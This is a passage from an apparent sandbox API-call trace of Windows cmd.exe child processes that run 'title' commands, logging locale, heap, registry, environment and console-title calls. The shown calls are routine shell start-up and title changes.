lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f960, cchData=128 | out: lpLCData="0") returned 2 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f960, cchData=128 | out: lpLCData="0") returned 2 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f960, cchData=128 | out: lpLCData="1") returned 2 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.590] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.590] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.590] GetProcessHeap () returned 0x3b0000 [0046.590] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x20c) returned 0x3c8ba0 [0046.590] GetConsoleTitleW (in: lpConsoleTitle=0x3c8ba0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.590] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.591] GetProcAddress (hModule=0x76f20000, lpProcName="CopyFileExW") returned 0x76f323d0 [0046.591] GetProcAddress (hModule=0x76f20000, lpProcName="IsDebuggerPresent") returned 0x76f28290 [0046.591] GetProcAddress (hModule=0x76f20000, lpProcName="SetConsoleInputExeNameW") returned 0x76f317e0 [0046.591] GetProcessHeap () returned 0x3b0000 [0046.591] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4012) returned 0x3cae20 [0046.591] GetProcessHeap () returned 0x3b0000 [0046.591] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cae20 | out: hHeap=0x3b0000) returned 1 [0046.591] _wcsicmp (_String1="title", _String2=")") returned 75 [0046.591] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0046.591] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0046.591] _wcsicmp (_String1="IF", _String2="title") returned -11 [0046.591] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0046.591] _wcsicmp (_String1="REM", _String2="title") returned -2 [0046.592] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0046.592] GetProcessHeap () returned 0x3b0000 [0046.592] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c8dc0 [0046.592] GetProcessHeap () returned 0x3b0000 [0046.592] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1c) returned 0x3c4650 [0046.592] GetProcessHeap () returned 0x3b0000 [0046.592] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x22) returned 0x3c4680 [0046.593] GetConsoleTitleW (in: lpConsoleTitle=0x22f870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.593] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.593] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.593] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.593] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.593] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.593] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.593] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.593] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.593] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.593] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.593] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.593] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.593] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.593] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.593] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.593] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.593] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.593] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.593] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.593] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.593] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.593] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.594] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.594] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.594] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.594] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.594] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.594] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.594] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.594] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.594] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.594] GetProcessHeap () returned 0x3b0000 [0046.594] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x34) returned 0x3c6610 [0046.594] GetProcessHeap () returned 0x3b0000 [0046.594] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c6610, Size=0x22) returned 0x3c46b0 [0046.594] GetProcessHeap () returned 0x3b0000 [0046.594] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c46b0) returned 0x22 [0046.594] GetProcessHeap () returned 0x3b0000 [0046.594] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x2e) returned 0x3c6610 [0046.595] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x22f3b0 | out: TokenHandle=0x22f3b0*=0x0) returned 0xc000007c [0046.595] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x22f3b0 | out: TokenHandle=0x22f3b0*=0x4c) returned 0x0 [0046.595] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x22f3c0, TokenInformationLength=0x4, ReturnLength=0x22f3c8 | out: TokenInformation=0x22f3c0, ReturnLength=0x22f3c8) returned 0x0 [0046.595] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x22f3c8, TokenInformationLength=0x4, ReturnLength=0x22f3c0 | out: TokenInformation=0x22f3c8, ReturnLength=0x22f3c0) returned 0x0 [0046.595] NtClose (Handle=0x4c) returned 0x0 [0046.595] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x22f390, nSize=0x0, Arguments=0x22f398 | out: lpBuffer="躀<") returned 0xf [0046.595] GetProcessHeap () returned 0x3b0000 [0046.595] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3c8eb0 [0046.595] SetConsoleTitleW (lpConsoleTitle="Administrator: 6881369") returned 1 [0046.596] GetProcessHeap () returned 0x3b0000 [0046.596] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c8eb0 | out: hHeap=0x3b0000) returned 1 [0046.596] LocalFree (hMem=0x3c8e80) returned 0x0 [0046.596] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.596] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0046.596] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.596] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 0 [0046.596] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.596] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.596] SetConsoleInputExeNameW () returned 0x1 [0046.596] GetConsoleOutputCP () returned 0x1b5 [0046.596] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.596] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.597] exit (_Code=0) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x50e00000" os_pid = "0x54c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb4c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" title 3382479\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0xc0 [0046.443] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe50 | out: lpSystemTimeAsFileTime=0x26fe50*(dwLowDateTime=0x1a91e8e0, dwHighDateTime=0x1d5e3d9)) [0046.443] GetCurrentProcessId () returned 0x54c [0046.443] GetCurrentThreadId () returned 0xc0 [0046.443] GetTickCount () returned 0x11565e5 [0046.443] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe58 | out: lpPerformanceCount=0x26fe58*=18836545394) returned 1 [0046.445] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0046.445] __set_app_type (_Type=0x1) [0046.445] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0046.445] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0046.445] GetCurrentThreadId () returned 0xc0 [0046.445] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc0) returned 0x38 [0046.445] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.445] GetProcAddress (hModule=0x76f20000, lpProcName="SetThreadUILanguage") returned 0x76f36d40 [0046.445] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.752] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.752] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fde8 | out: phkResult=0x26fde8*=0x0) returned 0x2 [0046.753] VirtualQuery (in: lpAddress=0x26fdd0, lpBuffer=0x26fd50, dwLength=0x30 | out: lpBuffer=0x26fd50*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.753] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd50, dwLength=0x30 | out: lpBuffer=0x26fd50*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.753] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd50, dwLength=0x30 | out: lpBuffer=0x26fd50*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.753] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fd50, dwLength=0x30 | out: lpBuffer=0x26fd50*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.753] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd50, dwLength=0x30 | out: lpBuffer=0x26fd50*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0046.843] GetConsoleOutputCP () returned 0x1b5 [0046.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.844] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0046.844] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.844] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0046.844] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.844] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 0 [0046.844] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.844] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.844] GetEnvironmentStringsW () returned 0x308b30* [0046.844] GetProcessHeap () returned 0x2f0000 [0046.844] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x309620 [0046.845] FreeEnvironmentStringsW (penv=0x308b30) returned 1 [0046.845] GetProcessHeap () returned 0x2f0000 [0046.845] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8) returned 0x3083b0 [0046.845] GetEnvironmentStringsW () returned 0x308b30* [0046.845] GetProcessHeap () returned 0x2f0000 [0046.845] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30a110 [0046.845] FreeEnvironmentStringsW (penv=0x308b30) returned 1 [0046.845] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eca8 | out: phkResult=0x26eca8*=0x40) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x0, lpData=0x26ecc0*=0x18, lpcbData=0x26eca4*=0x1000) returned 0x2 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x1, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x0, lpData=0x26ecc0*=0x1, lpcbData=0x26eca4*=0x1000) returned 0x2 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x0, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x40, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x40, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x0, lpData=0x26ecc0*=0x40, lpcbData=0x26eca4*=0x1000) returned 0x2 [0046.845] RegCloseKey (hKey=0x40) returned 0x0 [0046.845] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eca8 | out: phkResult=0x26eca8*=0x40) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x0, lpData=0x26ecc0*=0x40, lpcbData=0x26eca4*=0x1000) returned 0x2 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x1, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.845] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x0, lpData=0x26ecc0*=0x1, lpcbData=0x26eca4*=0x1000) returned 0x2 [0046.846] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x0, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.846] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x9, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.846] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x4, lpData=0x26ecc0*=0x9, lpcbData=0x26eca4*=0x4) returned 0x0 [0046.846] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eca0, lpData=0x26ecc0, lpcbData=0x26eca4*=0x1000 | out: lpType=0x26eca0*=0x0, lpData=0x26ecc0*=0x9, lpcbData=0x26eca4*=0x1000) returned 0x2 [0046.846] RegCloseKey (hKey=0x40) returned 0x0 [0046.846] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa57 [0046.846] srand (_Seed=0x5e47aa57) [0046.846] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 3382479\"" [0046.846] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 3382479\"" [0046.846] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.846] GetProcessHeap () returned 0x2f0000 [0046.846] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30ac00 [0046.846] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30ac10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.846] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.846] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.846] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0046.846] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.847] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.847] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.847] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.847] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.847] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.847] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.847] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.847] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.847] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.847] GetProcessHeap () returned 0x2f0000 [0046.847] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x30ae20 [0046.847] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fab0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.847] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26fab0, lpFilePart=0x26fa90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26fa90*="Desktop") returned 0x25 [0046.847] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.847] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f7c0 | out: lpFindFileData=0x26f7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x308990 [0046.847] FindClose (in: hFindFile=0x308990 | out: hFindFile=0x308990) returned 1 [0046.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f7c0 | out: lpFindFileData=0x26f7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x308990 [0046.847] FindClose (in: hFindFile=0x308990 | out: hFindFile=0x308990) returned 1 [0046.847] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f7c0 | out: lpFindFileData=0x26f7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x13408ec0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x308990 [0046.848] FindClose (in: hFindFile=0x308990 | out: hFindFile=0x308990) returned 1 [0046.848] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.848] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.848] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.848] GetProcessHeap () returned 0x2f0000 [0046.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309620 | out: hHeap=0x2f0000) returned 1 [0046.848] GetEnvironmentStringsW () returned 0x308b30* [0046.848] GetProcessHeap () returned 0x2f0000 [0046.848] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x309620 [0046.848] FreeEnvironmentStringsW (penv=0x308b30) returned 1 [0046.848] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.848] GetProcessHeap () returned 0x2f0000 [0046.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ae20 | out: hHeap=0x2f0000) returned 1 [0046.848] GetProcessHeap () returned 0x2f0000 [0046.848] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4016) returned 0x30ae20 [0046.848] GetProcessHeap () returned 0x2f0000 [0046.849] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x34) returned 0x3065d0 [0046.849] GetProcessHeap () returned 0x2f0000 [0046.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ae20 | out: hHeap=0x2f0000) returned 1 [0046.849] GetConsoleOutputCP () returned 0x1b5 [0046.849] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.849] GetUserDefaultLCID () returned 0x409 [0046.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="0") returned 2 [0046.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="0") returned 2 [0046.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="1") returned 2 [0046.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0046.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, 